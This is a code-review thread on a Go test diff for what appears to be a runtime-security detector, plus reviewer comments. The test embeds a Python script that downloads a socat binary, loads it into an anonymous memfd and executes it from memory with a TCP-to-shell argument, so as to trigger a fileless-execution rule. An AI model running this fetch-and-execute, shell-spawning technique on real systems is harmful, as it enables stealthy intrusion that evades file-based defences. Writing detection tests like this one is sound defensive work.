pkg/security/tests/process_test.go

```diff
@@ -1855,3 +1855,82 @@ func TestProcessResolution(t *testing.T) {
 		io.WriteString(stdin, "\n")
 	})
 }
+
+func TestProcessFilelessExecution(t *testing.T) {
+	python, whichPythonErr := whichNonFatal("python")
+	if whichPythonErr != nil {
+		python = which(t, "python3")
+	}
+
+	tests := []struct {
+		name    string
+		rule    *rules.RuleDefinition
+		command string
+		check   func(event *sprobe.Event, rule *rules.Rule)
+	}{
+		{
+			name: "fileless",
+			rule: &rules.RuleDefinition{
+				ID:         "test_fileless",
+				Expression: `exec.file.name == "memfd:"`,
+			},
+			command: fmt.Sprintf(`#!/bin/bash
+
+%s <<__HERE__
+#!%s
+
+import os
+from urllib.request import urlopen
+
+fd = os.memfd_create("", os.MFD_CLOEXEC);f2=open("/proc/self/fd/"+str(fd), "wb")
+f1=urlopen("https://github.com/3ndG4me/socat/releases/download/v1.7.3.3/socatx64.bin").read()
+f2.write(f1)
+f2.close()
+os.execv("/proc/self/fd/"+str(fd), ["kittens", "TCP:127.0.0.1:4242", "EXEC:sh"])
```

Comment:
That would be interested to also check when using:
os.execv(fd, ...)
as the Python doc (https://docs.python.org/3.6/library/os.html#os.execve) says that you can pass an open file descriptor and that it will call "fexecve" under the hood.

Reply:
maybe we could use the syscall tester instead of python + downloading an external resource ?

Reply:
oh good point! Testing this way seems more "integration test like" because it's more realistic, but this is a unit test. i'll change this.

and as mentioned in standup, writing here for posterity, opening just the fd and using fexecve works.